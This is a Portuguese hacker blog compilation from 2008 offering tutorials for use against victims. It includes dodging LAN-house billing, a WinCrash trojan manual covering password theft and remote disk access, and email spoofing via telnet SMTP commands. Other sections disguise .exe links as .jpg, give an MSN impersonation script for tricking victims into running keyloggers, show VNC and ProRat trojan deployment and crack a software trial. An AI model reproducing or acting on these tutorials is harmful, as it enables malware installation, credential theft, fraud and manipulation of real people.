domingo, 27 de abril de 2008

BURLAR TEMPO DE LAN HOUSES

CB CLock Freezer e ProcessExplorer



Bom, hoje vamos aprender a usar um PC de Lan
house de graça!




Sumponhamos que você vai a uma LanHouse e põe 30', so que você tá numa conversa
pelo msn interessante e você so tem 3', e nenhum tustão no bolso, o que você
faz?



Existe um programa chamado
ClockFreezer
que para o relógio do Windows impossibilitando a marcação do
seu tempo, ou seja não marca o seu tempo na LanHouse:




Imagem




Senha:

http://www.invasao.com.br






Após baixar não precisa de instalação, é so abrir o programa e clicar em
Congelar, pra voltar ao normal é so
clicar em Descongelar. Tem a opção "Hide"
que deixa o programa invisivel. Para acertar a hora, pelo proprio Clock freezer,
é so acessar

http://www.horacerta.com.br/
!



P.S. Pode não funcionar pois alguns
programas já estão Habilitados contra esse clock freezer!



Outro metodo é usando o
ProcessExplorer
, também não precisa de instalação, ao executar você clica
em cima do processo do programa da LanHouse e clica em
Kill Process!




Imagem




Senha: zangk2k



So funciona em windows XP



Dica:Como não dar pra voltar atras e reabrir o programa, você clica em
File>Shutdown>Restart. O PC vai
reiniciar, ai você inventa a desculpa: "Olha a
maquina deu problema aqui, reiniciou sozinha!"




Nenhum dos dois programas precisa desabilitar o AV!



Pronto agora é so Hackear!

Manual do Wincras

Manual do Wincras




O WinCrash é um programa dividido em duas partes, um Cliente e um Servidor... O
Cliente é o programa que você irá usar pra se conectar ao


Servidor
pela internet ou por uma


rede
interna com protocolo TCP/IP.

Para se conectar ao Servidor (server.exe) ele prescisa estar rodando no
computador que você deseja se conectar. O Servidor é invisivel, não aparecendo
nem no CTRL+ALT+DEL(lista de processos visiveis rodando)... Quando o Servidor é
executado, ele se auto-instala no

sistema
, se executando toda vez que o
Windows reiniciar...

Para se conectar ao Servidor basta saber o IP (Internet Protocol). Os serviços
funcionam através de pacotes encriptados, usando como chave o IP local e o IP
remoto...

A Interface do Cliente é simples e fácil de entender, até pra quem não sabe
Inglês, pois as descrições dos serviços estão em Português...

Você pode usar o Cliente para operar o Servidor, tendo muito mais controle do
que a própria pessoa que está em frente ao micro remoto(Servidor)... Mas também
pode usa-lo só para se divertir com seus amigos.



Os Comandos:

ATENÇÃO.

Para cada comando no Cliente, existe um para desfazer

EX: Para o Open CD-Rom Drive, existe o Close CD-ROM Drive



Keyboard Lights Bomb

Faz com que as luzes do CAPS_LOCK e SCROLL_LOCK fiquem piscando sem parar de
meio em meio segundo.



Lock Mouse

Trava o mouse numa área pequena da tela, fazendo com que o Mouse não consiga
sair de lá, até que seja acionado o serviço "Mouse Unlock" no Cliente.



Move Mouse

Lhe dá opções variadas de mover o ponteiro do mouse do Servidor



Monitor OFF

Desliga o Monitor do Servidor



Flip Screen

Inverte a tela do Servidor



Open CD-ROM Drive

Abre a gaveta do CD-ROM do Servidor



Flood Server Printer

Imprime uma página com xingamentos na impressora do Servidor

Atenção. Certifique-se antes se a impressora do Servidor está ligada, pois se
não, o Servidor vai ficar travado ate a impressora seja ligada.



System Keys OFF

Desabilitas as sequencias de teclas do sistema, ex: CTRL+ALT+DEL, ALT+TAB e as
teclas especiais de alguns teclados (tecla ÿ )



Clipboard Lock

Trava a Área de Transferencia do Servidor com a mensagem "WinCrash"



Screen Saver Bomb

Ativa proteção de tela ( se existir ) do Servidor de 2 em 2 segundos



Hide Taskbar

Some com a barra de tarefas do Servidor



Hide Start Button

Some com o Botão Iniciar do Servidor



Disable Start Button

Desativa o Botão Iniciar do Servidor



Active the Screen Saver

Ativa proteção de tela ( se existir ) do Servidor



Remove Desktop Wallpaper

Remove o papel de parede do Servidor



Change Desktop Wallpaper

Lhe dá a possibilidade de escolher o papel de parede do Servidor

Atenção

A imagem prescisa estar no diretório Windows do Servidor. Ponha somente o nome
da

imagem para mudar o papel de parede

EXEMPLO : ondas.bmp



Modify Remote Date

Modifica a data do Servidor para 1/7/94. A data do lançamento do Real.



Close Server EXE

Fecha o Servidor até que o Windows reinicie



Delete Server EXE

Deleta o aplicativo Servidor WinCrash da vítima



Lock Up the System *

Trava o Computador do Servidor

Close all Programs *

Fecha todos os programas e faz log-out do Windows no micro do Servidor



Exit Windows *

Fecha o Windows do Servidor



Shutdown Windows *

Desliga o Windows



MSG Box [Chat]

Abre uma janela de chat pra você poder conversar com o Servidor. Dentro da
janela de chat tem 3 botões

(Flood, Beep, Joke)

Flood - Faz com que o Servidor fique muito lento, exibindo milhares de mensagens
continuas na tela do Servidor

Beep - Toca um BEEP no Servidor . O Servidor também pode mandar um BEEP para
você

Joke - Faz com que a cada 2 minutos seja exibida uma mensagem irritante no
Servidor



Send Text

Você poder mandar um texto para a janela ativa do Servidor

EXEMPLO. Você manda o texto "WinCrash Rulez" para o Servidor, se o Servidor
estiver com por exemplo o "Bloco de Notas" aberto a mensagem "WinCrash Rulez"
vai aparecer no texto



Get Server Information

Pega o nome, a empresa, a data da BIOS, o processador e quantidade de memória do
Servidor. Se você apertar o Botão "Save Information on TXT" o WinCrash ira gerar
um arquivos chamado "Info.txt" no diretório do WinCrash.



View Remote Passwords

Lhe permite ver todas as senhas Dial-Up, navegador, e todas as senhas arquivadas
em cache...

Só visualiza aquelas senhas que foram salvas com o comando "Salvar Senha".

Se você apertar o Botão "Save Passwords on TXT" o WinCrash ira gerar um arquivos
chamado "Senhas.txt" no diretório do WinCrash contendo as senhas



View Remote Netstat

Lhe permite ver o Estato das portas e da conexão do Servidor . Você podera
descobrir se o Servidor está com o NetBus ou o BO Instalado..



View Active Process

Lhe permite ver os processos ativos (programas que estão rodando, até
escondidos) do Servidor, como o Servidor WinCrash



Open Server Hard Disk

Quando é acionado ele abre um FTP Server no Servidor. Isso quer dizer que você
poderá se conectar pelo seu Navegador de Internet ou seu programa de FTP
preferido no C:\ do Servidor. EXEMPLO: "ftp://IP_DO_SERVIDOR" e pronto, você
estara mexendo no Hard Disk do Servidor... Para prevenir futuros problemas feche
o servidor quando acabar de mexer, clicando em "Close Server Hard Disk"



Play Wav Files

Para você tocar um som do tipo Wav no Servidor.

EXEMPLO : C:\Windows\Media\tada.wav



Delete and Execute Files

Com esse comando você podera executar e deletar arquivos no Servidor. No comando
executar e deletar ja vem alguns programas e arquivos frequentemente encontrados
nos computadores. Mas você poderá por um programa específico que queira executar
ou deletar

EXEMPLO : Windows\Calc.exe

Atenção, não ponha C:\



Modify Remote Autoexec.bat

Modifica o Autoexec.bat do Servidor, transformando-o em varias linhas
irritantes, mas nada grave.

* O Cliente irá se desconectar após esses comandos



Perguntas mais frequentes (FAQ)

P : Como descubro o IP do Servidor?

R : Você pode usar o ICQ. Pegue um crack pra ele na nossa página para mostrar o
IP de todas as pessoas na sua lista no info.

Pode também usar o IRC, usando a tag: /dns <nick da pessoa>



P : Como faço para me conectar?

R : Depois de descobrir o IP do Servidor, pegue o IP e ponha no campo "Target IP"
do Cliente WinCrash.



P : Como faço para me conectar a mim mesmo?

R : Você prescisa rodar o Servidor(server.exe) na sua máquina. Para se conectar
sem usar a Internet use o IP "127.0.0.1"(loopback). Os comandos são exatamente
os mesmos.

Obs. Para remover o programa do sistema, use o serviço: Delete Server EXE



P : Como faço para remover o Server.exe ( Servidor )

R : Use o comando Delete Server EXE.



P : O comando "View Remote Passwords" não exibe nenhuma senha, o que eu faço?

R : Tente se conectar de novo. Mas provavelmente a causa do problema seja que o
Servidor não tenha salvo suas senhas com o comando "Salvar Senhas".



P : Os comandos "View Remote Passwords", "View Remote Netstat" e "View Active
Process" mostram seus items desalinhados, porque?

R : Isso acontece quando a conexão com o servidor é muito rápida (Ex : Você
estar conectado com você mesmo ). Provavelmente isso irá se alinhar quando você
estiver conectado com alguém da Internet.

COMO CRACKEAR PROGRAMAS COM PERÍODO DE EVACUAÇÃO

COMO CRACKEAR PROGRAMAS COM
PERÍODO DE EVACUAÇÃO



Bem, vou usar o FontCreator 5.6 como nosso alvo



Primeiro mudamos a data pra expirar ele...



Vai aparecer alguma coisa assim:



You are on day # of your 30-day evaluation
period.




Se clicarmos em Use evaluation version
o programa vai dizer que não vai dar pra salvar a fonte e etc (Se o numero
tiver acima de 30)



Hora de crackear =)



Vamos supor que tá escrito:



You are on day 53 of your 30-day evaluation
period.




--



Precisamos de um programa editor de memória como o Cheat Engine:




http://cheatengine.org/




--



Abrimos o FontCreator e o Cheat Engine, clicamos no computador piscando e
escolhemos FontCreator.exe e então
colocamos 53 em Value e clicamos em Frist Scan, deve aparecer alguns valores
do lado da tela, selecione todos e clique na setinha apontando pra baixo.



Os valores irão pra parte de baixo da tela, e então selecione todos, dê um
clique direito e escolha:



Change Record > Value



e coloque 1.



Então você estará no dia 1 de 30 (Não se preocupe se dizer que você está no
dia 53 de 30 ainda) agora clique em Use
evaluation version
e você vai poder usar o progama normalmente, o único
mal é que você vai ter que fazer toda vez que abrir o programa, ou fazer um
trainer (programa que altera valores da
memória automaticamente)
.



PS: Só funciona em programas que não tem limitação mesmo sem ter expirado.

FakeMail pelo Telnet

FakeMail pelo Telnet




Um jeito bem simples para mandar FakeMails. Para quem não sabe
fakemail eh mandar um e-mail fingindo ser uma outra pessoa.

A versão do Telnet (do Windows XP ou 9x) ou o sistema operacional
NÃO vai mudar o meio de fazer o FakeMail, só vai mudar o programa.


No Windows XP vá em: Iniciar, Executar, Telnet.exe

Você vai ver a tela:



Código:

Selecionar tudo

Bem-vindo ao Cliente MS Telnet



O caractere de

escape
é 'CTRL+ç'



Microsoft Telnet>




Digite: open
smtp.servidordeemails.com.br 25


No caso do

servidor
que eu me conectei recebi a resposta:

220 smtp.provesul.com.br
ESMTP Postfix




(Esse comando pode variar para: HELLO, EHLO, HELO)

HELO
localhost

MAIL FROM:
seuemail@fakeaqui.com


RCPT TO:
vitimadofake@mailaqui.com


SUBJECT:
assunto

DATA

Digite o conteudo da
mensagem aqui

qundo voce acabar termine com um "." em uma linha em branco e de
enter
.

QUIT



Pronto, e-mail fake enviado!!!

Algumas coisinhas importantes:

1. Para resetar as
configurações de quem vai receber e tudo mais digite "RSET"

2. Existem alguns
servidores SMTPs que bloqueiam o envio de e-mails sem colocar o
login e senha, então de nada vai adiantar tentar com esse
servidor...

3. Alguns servidores SMTPs
também bloqueiam alguns comandos, no SMTP que eu estava testando
eu consegia mandar os e-mail e tudo mais, mas não conseguia por o
assunto, quando eu colocava o comando "SUBJECT: Assunto" eu era
desconnectado, mesmo assim isso não impediu o envio do e-mail!

4. Não é possivel anexar
arquivos pelo Telnet (se existe eu não sei como faz ;P)





Divirtam-se!![/b]







CRIANDO UM HD VIRTUAL DE 1 GB

CRIANDO UM HD VIRTUAL DE 1 GB



E ai galera blz... quero a opnião de vcs sobre meu tutorial pra ve se eu
aprendi a lição direito Aceito Criticas Elogios e Sugestões, pois sem isso
não tem como eu melhorar a qualidade dos meus tópicos.



Bom primeiramente o intuito desse tutorial é ensinar a vocês a criarem uma hd
virtual pra compartilharem programas, arquivos e tudo mais... bom chega de fala
vamos trabalhar...





Primeiro vamos acessar o site.





http://www.4shared.com



Agora na tela principal, vamos clicar em sign up.


Imagem





Em seguida colocamos nosso e-mail, senha "password" e escolhemos o plano free,
depois so clica em sign up de novo...


Imagem





Certo agora estamos na nossa HD virtual.. ooohhhhh!!!!



Abaixo vou passar algumas configurações basicas, o resto num tem muito segredo e
qualquer duvida estamos aqui.



Bom primeiro vamos ativar o compartilhamento e configurar um "alias" pra ficar
mais facil quando os outros quiserem acessar nossa HD.



Na tela principal da nossa HD clique em activate.


Imagem





Em seguida vamos cair nessa tela...


Imagem





Numerei na imagem pra poder explicar melhor.



1 = É onde escolhemos se vamos ou não compartilhar nossos arquivos.



2 = Aqui vc pode optar por colocar uma senha para os outros acessarem sua HD...
Se vc deixar desabilitado qualquer um tem acesso... e nesse shared link, e o
link pra o pessoal acessar sua HD, mas no bloco 3 agente cria um alias q e bem
mais facil de passar pra alguem acessar...



3 = Como dito acima aqui nos criamos um alias pra nossa HD... um exemplo, o link
da minha HD seria:

http://www.4shared.com/dir/3668459/b2faea71/sharing.html


Mas com o alias fica somente:


http://scarecrow.4shared.com
(Muito mais facil)



4 = Aqui e um dos passos mais importantes pq é aqui que nos vamos definir o
nivel de acesso dos que forem acessar nossa HD... mas como vcs podem ver são
permissões basicas então não tem muito segredo pra configurar...eu autorizei qse
tudo pq coloquei senha...mas vai de cada um..



Bom depois de configurar é só clicar em save e depois em my 4shared no lado
esquerdo em cima para voltar a pasta...



Agora na tela principal novamente, vamos ver os menus q temos...




Imagem







1 = em upgrade nos defimos algumas configurações como a senha da nossa conta
"não e a senha do compartilhamento para os outros acessarem", o nome q sera
exibido como publisher quando os outros acessarem, e-mail e por ai vai...



2 = Aqui nos fazemos os uploads dos nossos arquivos" sugiro q crie pastas antes
(adiante o botão q cria pastas ) para melhor organização...no upload normal vc
upa um arquivo de cada vez e no multiupload vc faz varios de uma unica vez "como
se vcs não soubessem... " desde de que os arquivos tenham no maximo 50MB
"isso vcs num sabiam" ...



3 = item 3 como uma barra de ferramentas... vou falar delas da esquerda pra
direita:

Copiar, Recorta, Colar, Excluir, CRIAR PASTA, E-mail, thumbsnail, Folders....




Bom acho q é só galera... como eu disse no começo num tem muito segredo... agora
e so vcs criarem as HDS e sairem compartilhando pelos foruns....

Para quem quiser fuçar ma minha HD a Senha é: invasao



Num tem muita coisa lá so uns programas basicos, mas fiquem a vontade para
baixar....





Abraços a Todos







Espero q tenham gostado

CAMUFLA VIRUS EM ENDEREÇOS

CAMUFLA VIRUS EM ENDEREÇOS



Ola pessoal



eu recebi um link muito estranho do meu amigo "FabioMoreno"



ele me passo para eu ver, ele tmb acho estranho





Código:

Selecionar tudo

http://www.dfold.net/zeroboard/fotos.exe#/fotolog/fotosacidentes_ontem/fotos.jpg






ai comecei a estudar o link



como vcs podem perceber existe um sinal de "#"



e cliquei na minha maquina virtual so que o link acima esta quebrado.



intow como eu sou curioso peguei um .exe e comecei a colocar uns codigos



e acabei achando uma coisa legal





Código:

Selecionar tudo

http://pwp.netcabo.pt/0176170301/down/elifoot2007pt2.exe#/fotolog/img.jpg







O link acima é o

jogo
Elifoot 2007, mais porem olhem que o final esta





".jpg"



nao preciso dizer mais nada né ?



intow pessoal a criatividade esta ai para usar e abusar ...



abraços

DESBLOQUEIO DE CELULARES

DESBLOQUEIO DE CELULARES



Escrevo neste artigo um tutorial ensinando a desbloquear celulares
de diversas marcas, como

Siemens
,

Nokia
,

Samsung
,

LG
,

Motorola
e etc. Neste tutorial não há necessidades
de utilizar cabos, apenas um software que gera o código de desbloqueio.


A prática de desbloquear

celulares
não é ilegal
, e o que me fez pesquisar e escrever a
respeito foi o fato de ter visitado ontem um site chamado
Bloqueio Não,
que tem como intuito divulgar um manifesto contra a prática de algumas
operadoras em bloquear os celulares para não aceitar a utilização de chips de
outras operadoras.


Vale deixar claro que o tutorial não foi elaborado por mim, deixo às devidas
fontes no final do artigo. Não trabalho com desbloqueio de celulares, então
afirmo que não sou expert no assunto, mas comentários e dúvidas serão
bem-vindos, farei o possível para ajudar.


Para dar início ao tutorial ao desbloqueio do celular,
deve-ser fazer o download do programa que é uma

calculadora
necessária para os cálculos de desbloqueio. Clique no link
abaixo:


» Crux
Unlocker v5.0


Instale o

programa
e execute-o. Percebe-se que é tudo muito simples e de fácil
entendimento. No exemplo de tutorial é utilizado o

Nokia
N-Gage QD, mas pode ser feito com qualquer modelo.


Para começar o desbloqueio, é preciso antes saber o IMEI do

celular
. Para isso, digite o código *#06# e vai aparecer na tela, ou olhe na
parte traseira, atrás da bateria.


ALERTA: NUNCA passe o IMEI do seu aparelho para ninguém. Com este
código, o seu aparelho poderá ser facilmente clonado.


Selecione a fabricante do seu

aparelho celular
e depois selecione o modelo. Logo abaixo, digite o IMEI do
seu celular e selecione o país e a operadora.



Desbloqueio de celulares

No programa vai aparecer todas as operadoras:

TIM
,

CLARO
,

OI
,

VIVO
e etc.


Obs.: Na operadora TIM, aparecem 3 descrições: TIM, TIM NEW1 e TIM NEW2. Para
saber qual operadora escolher faça o seguinte:


- Verifique uma série de números em seu chip, deverá começar com 8955XX onde
XX representa o código da sua rede.


02 = TIM

03 = TIM NEW 1

04 = TIM NEW 2


- O número 02 corresponde ao nordeste, centro-oeste e sudeste (exceto SP).

- O número 03 corresponde á São Paulo.

- O número 04 ao sul (PR, SC, RS) e ainda MS.


Após inserir todos os dados, clique em “Calculate“. No lado direito irá
aparecer alguns códigos:



desbloqueando celulares

Observe na imagem, que o programa gerou 7 códigos. É destacado os dois que
realmente vão importar para o desbloqueio do aparelho. O primeiro código, que
foi destacado na cor preta, é o código padrão. Apenas com ele na maioria das
vezes o aparelho é imediatamente desbloqueado, não fazendo necessário a
utilização do código destacado em vermelho, que é chamado de Master Code. Anote
os dois códigos e desligue o seu celular.


Agora, retire o chip da operadora e ligue o celular novamente. Como possuímos
apenas 5 tentativas, utilize o código #pw+***************+1# (Para gerar os
algarismos P, W e +, basta apenas segurar a tecla *). Caso o celular não
desbloqueie, tente com o código #pw+***************+7#.


Se o celular ainda não estiver desbloqueado, reveja todos os passos e tente
novamente. Lembrando que você só tem 5 tentativas para tentar desbloquear. Após
estourar o limite, seu celular será desbloqueado apenas via hardware (cabos,
etc).

INTERNET DE GRAÇA NO CELULAR

INTERNET DE GRAÇA NO CELULAR



Galera segue mais um tuto,mais não sei se funciona porque meu cel é cdma,e
tem que ser gsm,passei isso pra um amigo e ele disse que funfou

se alguem mais puder testar...



NET GRATIS NO CEL (EXPLICAÇÃO)



MENU > CONFIGURAÇÕES > CONFIGURAÇÃO > CONFIGURAÇÕES PESSOAIS



agora adiciona um novo

PONTO
DE ACESSO (OPÇÕES > ADICIONAR NOVA > PONTO DE ACESSO)



Configuração do ponto de acesso:

NOME DA CONTA: *qualquer um* (DISCADA 0800)



CONFIGURAÇÕES DE PONTO DE ACESSO

PORTADORA DE

DADOS
: Dados GSM



CONFIGURAÇÕES DA PORTADORA:

Número de discagem: 0800992190

Tipo de autenticação: Normal

Tipo de chamada de dados: Analógica

Velocidade da chamada de dados: automática

Nome de usuário: UU/ppp139378

Senha: aQ&J+Yev

Exibir janela de terminal: Não





agora ATIVA



OK?!



tem mais...



agora adiciona WEB (OPÇÕES > ADICIONAR NOVA > WEB)



Nome da conta: Web 0800

Homepage: *qualquer um*

Nome de usuário: dexa em branco

Senha: dexa em branco

Usar ponto de acesso preferido: Sim



agora ATIVA



---



MENU > CONFIGURAÇÕES > CONFIGURAÇÃO > CONFIGURAÇÕES PADRÃO

escolhe 'Configs pessoais'



PONTO DE ACESSO PREFERIDO

Escolhe 'Discada 0800'



-----





beleza?!



so tem um problema... so funciona uns 15min por vez...

heheeheh





Abcos

WORK

BURLANDO TODOS OS SHARES

BURLANDO TODOS OS SHARES



Não sei ao certo se são TODOS mesmo que guardam valores de IP,

tempo
de espera, arquivo baixado "x" vezes em javascript, uma forma de obter
esses valores é digitando na barra de endereços:



javascript:alert(var)



após saber a var é só:



javascript:alert(var=valor)



E assim você pode fazer downloads sem esperar 1 hora no rapidshare (não sei se
isso fica em uma variável), o tempo pra baixar e etc.



PS: Se uma variável do listão não funcionar tente a próxima...



Agora vai a lista de variaveis:



javascript:alert(t)

javascript:alert(time)

javascript:alert(wtime)

javascript:alert(wttime)

javascript:alert(waittime)

javascript:alert(wittime)

javascript:alert(waitime)

javascript:alert(tm)

javascript:alert(wtm)

javascript:alert(wttm)

javascript:alert(waittm)

javascript:alert(waittm)

javascript:alert(tim)

javascript:alert(wtim)

javascript:alert(wttim)

javascript:alert(waittim)

javascript:alert(waitim)

javascript:alert(tme)

javascript:alert(wtem)

javascript:alert(wttem)

javascript:alert(waittme)

javascript:alert(waitme)

javascript:alert(w)

javascript:alert(wt)

javascript:alert(wait)

javascript:alert(wit)

javascript:alert(wai)

javascript:alert(s)

javascript:alert(sec)

javascript:alert(secon)

javascript:alert(second)

javascript:alert(scnd)

javascript:alert(t)

javascript:alert(tm)

javascript:alert(ip)

javascript:alert(ip2)

javascript:alert(c)

javascript:alert(l)

javascript:alert(limit)

javascript:alert(lmt)

javascript:alert(limt)

javascript:alert(lmit)

javascript:alert(timelimit)

javascript:alert(timelmt)

javascript:alert(timelimt)

javascript:alert(timelmit)

javascript:alert(tmlimit)

javascript:alert(tmlmt)

javascript:alert(tmlimt)

javascript:alert(tmlmit)

javascript:alert(timlimit)

javascript:alert(timlmt)

javascript:alert(timlimt)

javascript:alert(timlmt)

javascript:alert(tmlimit)

javascript:alert(tmlmt)

javascript:alert(tmlimt)

javascript:alert(tmlimt)

javascript:alert(tmlimt)

javascript:alert(premium)

javascript:alert(prmum)

javascript:alert(premum)

javascript:alert(min)

javascript:alert(mn)

javascript:alert(m)

javascript:alert(minute)

javascript:alert(minte)

javascript:alert(puser)

javascript:alert(user)

javascript:alert(i)

javascript:alert(sc)

javascript:alert(timer)

javascript:alert(temp)

javascript:alert(time_limit)

javascript:alert(wait_time)

javascript:alert(down)

javascript:alert(dwn)

javascript:alert(download)

javascript:alert(dnw)

javascript:alert(downlimit)

javascript:alert(downlmt)

javascript:alert(downlimt)

javascript:alert(dwnlimit)

javascript:alert(downlmt)

javascript:alert(downlimit)

javascript:alert(downloadlimit)

javascript:alert(downloadlmt)

javascript:alert(downloadlmt)

javascript:alert(downlimt)

javascript:alert(download_limit)

javascript:alert(limiter)

javascript:alert(down-limit)

javascript:alert(down-lmt)

javascript:alert(down-limt)

javascript:alert(dwn-limit)

javascript:alert(down-lmt)

javascript:alert(down-limit)

javascript:alert(

download
-limit)

javascript:alert(download-lmt)

javascript:alert(download-lmt)

javascript:alert(down-limt)

javascript:alert(down_limit)

javascript:alert(down_lmt)

javascript:alert(down_limt)

javascript:alert(dwn_limit)

javascript:alert(down_lmt)

javascript:alert(down_limit)

javascript:alert(download_lmt)

javascript:alert(download_lmt)

javascript:alert(dlimt)

javascript:alert(dlimit)

javascript:alert(dlmt)

javascript:alert(dlimt)

javascript:alert(dlimit)

javascript:alert(dlmt)

javascript:alert(d-limt)

javascript:alert(d-limit)

javascript:alert(d-lmt)

javascript:alert(d-limt)

javascript:alert(d-limit)

javascript:alert(d-lmt)

javascript:alert(d_limt)

javascript:alert(d_limit)

javascript:alert(d_lmt)

javascript:alert(d_limt)

javascript:alert(d_limit)

javascript:alert(d_lmt)

javascript:alert(dllimt)

javascript:alert(dllimit)

javascript:alert(dllmt)

javascript:alert(dllimt)

javascript:alert(dllimit)

javascript:alert(dllmt)

javascript:alert(dl-limt)

javascript:alert(dl-limit)

javascript:alert(dl-lmt)

javascript:alert(dl-limt)

javascript:alert(dl-limit)

javascript:alert(dl-lmt)

javascript:alert(dl_limt)

javascript:alert(dl_limit)

javascript:alert(dl_lmt)

javascript:alert(dl_limt)

javascript:alert(dl_limit)

javascript:alert(dl_lmt)

javascript:alert(w-time)

javascript:alert(wt-time)

javascript:alert(wait-time)

javascript:alert(wit-time)

javascript:alert(wait-time)

javascript:alert(w_time)

javascript:alert(wt_time)

javascript:alert(wait_time)

javascript:alert(wit_time)

javascript:alert(wait_time)

javascript:alert(download_wait_time)

javascript:alert(downloadwaittime)

javascript:alert(a~z)

UNS TRUQUES PARA FAKES DE MSN

UNS TRUQUES PARA FAKES DE MSN



Uma técnica muito usada para mandar Keylogger, Virus, Trojans ou outro tipo
de arquivo, eh usando o MSN Fake, onde geralmente faz um msn colocando no nick
frases muito gays e fotos de mulheres que sempre são "Gostosas", então vou
ensinar algumas técnicas que eu uso para MSN Fake que tem sempre 100% de
chance de funcionar.. simplesmente não tem como não conseguir..



Abaixo algumas coisas que não se deve esqueçer:



Na Escrita

Você apartir do momento que entro no MSN, tem que agir como mulher... tem que
fingir que é sentimental e sempre usar palavras como "obrigada" ou palavras que
tire a possibilidade que descubra que você é homem por exemplo, "ah eu queria ir
mais axu q naum vai dar rsrs".... mais se falar algo como "ahh tpw eu queria ir
mais nem vai dar xD" ai fica esquesito né? Então também eh muito importante
lembrar de não usar palavras que eh muito usada em msn por homens.. e
substitui-las por palavras meladas xDDD

E Também nunca dispensar a font Rosa hehe, ela ajuda muito



Nas Fotos

Uma ótima dica é nunca usar fotos dessas muiés que cata em site porno ou no
google, sempre de alguem que você conheça e que não tenha as mesmas fotos no
orkut pro exemplo uma prima...Assim a pessoa não fica desconfiada...



Tentando Mandar arquivo .exe

O Mais importante eh nunca ter pressa em mandar o arquivo... nem se demora 1
semana, o importante eh fazer ele pedir ... veja alguns exemplos:



Vítima:

Oi

MSN Fake:

Oie! *o* td bom?

Vítima:

td i vc?

MSN Fake:

tb rsrs.. ta fazendu o que de bom? haha

Vítima:

nada só conversando com vc..

MSN Fake:

ahhh assim eu fico com vergonha rsrs

Vítima:

hehe.. e ai tem alguma foto pra manda?

MSN Fake:

ahhh eu so gorda tenhu vergonha

Vítima:

eh nada vc eh mó gatinha

MSN Fake:

ahh olha q eu acreditu em hahaehaeh

Vítima:

ah manda ai vai ;D

MSN Fake:

tb vai.. só porque vc ta pedindo..

Vítima:

aee vlw!

MSN Fake:

kk d nada...

Nessas horas você envia uma foto.. de preferencia uma
que mostre o corpo inteiro


Vítima:

nussa q bunita! mais bunita que eu parecia na imagem de exibição

MSN Fake:

ahh brigada!!! mais eu sei que só ta falando issu pra me deixa feliz rsrs

Vítima:

q nada.. vc eh mó gata mesmu

MSN Fake:

ahh entaum vou acreditar em rsrs

Vítima:

hehe tem mais?

MSN Fake:

ah depois tiro umas pra vc =]

Vítima:

bl xDDD

MSN Fake:

mais ó.. do que adianta eu ser bunita se eu sou burra? :'(

Vítima:

eh nada vc n eh burra n...se falar algo parecido
acredite, vc ja conseguiu xD[/color]

MSN Fake:

eh q assim, eu to tentando fazer um video com minhas fotinhas.. mais n consigo

Vítima:

ahhh se quiser eu te ajudo [b]ou
Nossa... mais vc n eh burra...

MSN Fake:

ebaaa!!! vou te mandar as fotos com o programa q to usando ta?
Caso não se ofereçer a ajudar fale vc
quer me ajuda? que ta tudo em ingles e n entendo nada...

Vítima:

Então manda ai q eu faço rapidão...OU Blz
vai... vou ver o que consigo fazer

Aqui vc manda um zip com o maximo de fotos possiveis
com um arquivo que noc aso deveria ser algo que intenda que seja um arquivo de
vídeo usando o icone por exemplo do windows media player...


MSN Fake:

Brigada depois que terminar me manda em.. inquanto vc vc recebe vo tomar um
bainhu bem gostoso e ja venhu *o* bjus

Vítima:

Ok





kkkk esse ai eh o que eu mais uso.. sempre funciona n tem como n catar o cara
agora se caso o cara abrir e falar q n conseguiu usar e n perceber q eh algum
tipo de arquivo q ele não esperava arrume alguma desculpa e depois fala que não
precisa mais com outra desculpa que deve ser muito boa, ai se caso ele descobrir
q eh algum tipo de arquivo q elenão esperava não vai zua o kara falando que
passou por exemplo KL... primeiro espera vc pegar por exemplo uma senha antes de
zua ele huaeuhaehuae...







Outras Dicas

Nunce fale nada sobre jogos e qualquer assunto sobre computador fale que vc não
entende muito sobre isso, assim o cara nunca vai suspeitar e também n ficar mto
tempo ON no msn fake pro cara pensar q eh algum cara viciadu hehe...





Então eh isso caso alguem for testar posta resultados kkk Flw.

INVASÃO BÁSICA DE UM HACKER

INVASÃO BÁSICA DE UM HACKER



Olá amigos, estou passando este vnc mais um tuto facin facin, pq eu e um
amigo editamos ele......vcs nunca viram um vnc tão simples de usar como esse!!!!






TUTORIAL:




1- Extraia os dois

arquivos
;



2-Extraia o Acessar e o Server novamente para a Área de Trabalho;



3-Abra o Acessar;



4- Dê o seu jeitinho de Engenharia Social e pegue o Ip da Vítima



5-Faça com que a Vítima aceite o arquivo(Server.exe) e execute;



6-Abra o Acessar, coloque o ip da Vítima e Clique em Acessar;



E Pronto!!!, vc tem acesso ao pc da vítima, faça o que bem entender



O VNC não é um vírus, e quando a vítima o executa ele fecha sozinho e abre um
espaço vazio na barra de tarefas próximo ao relógio do windows.



Link do

Download
:


COMO BURLAR O RAPDSHARE

COMO BURLAR O RAPDSHARE



Você acaba de fazer um download no Rapidshre então parti pro proximo download
seja la de programas, animes, videos etc etc oque acontece?:cry:.



Imagem




Agora vem a parte que eu + gosto abra a pagina:
http://rapidcat.us/




Imagem




Agora copie o link da pagina da primeira imagem, no caso a pagina de espera que
o Rapishare lhe da ao tentar fazer um download atras do outro e cole:



Imagem




Clicando no botão aonde eu circulei si é que podemos chamar aquilo de circulo
ira aparecer esta pagina então clique aonde eu circulei:



Imagem




Repare agora que apareceu um contador, contagem regressiva para felicidade:



Imagem




Olha só, zerou, agora clique na opção que ira aparecer, ele é parecido com o
botão da quarta imagem em seguida veja só um novo link :



Imagem




Bom agora seja feliz , copie o link de seu download e cole em seu navegador
fazendo o download normalmente.



Como podem ver, um gerador de links rapidshre premium e você pode fazer 6
downloads ao mesmo tempo sem precisar esperar o tempo que o rapidshare pede
quando você termina um download, repetindo os mesmos passos do tutorial no
maximo 6 vezes.



Obs: Ao entrar no site
http://rapidcat.us/
e não ver a pagina como a segunda imagem mostra estando então: Temporary closed
until our daily bla bla bla, tente outra hora.É meio dificil + quebra um galhão
quando eu conssigo acessar, acreditem.



Bom downloads.

CONEXÃO COM NO-IP

CONEXÃO COM NO-IP



Não me responsabilizo pelas

informaçoes
abaixo, use do modo mais etico possivel.





Links de programas nescessarios :



ProRat:


http://www.prorat.net/downloads.php?id=ProRat_v1.9_Fix2


Molebox:


http://baixaki.ig.com.br/site/dwnld18199.htm






Bom antes de tudu, vou explicar o que é conexão reversa. E quandu você
liga seu

servidor
a seu ip, quandu uma "vitima" estiver online, se seu trojan
estiver instalado, as informaçoes da pessoa, como o ip dela, irao para
você seu ip, e você poderar ver estar informações pelo ProRat





Antes de tudu, entre no

site


http://www.no-ip.com
. Va em signup ! Após fazer sua conta
normalmente e ativando ela pelo imail você irar criar seu ip fixo.

COMO ASSIM IP FIXO ?? Sempre que você se conecta a internet, você recebe
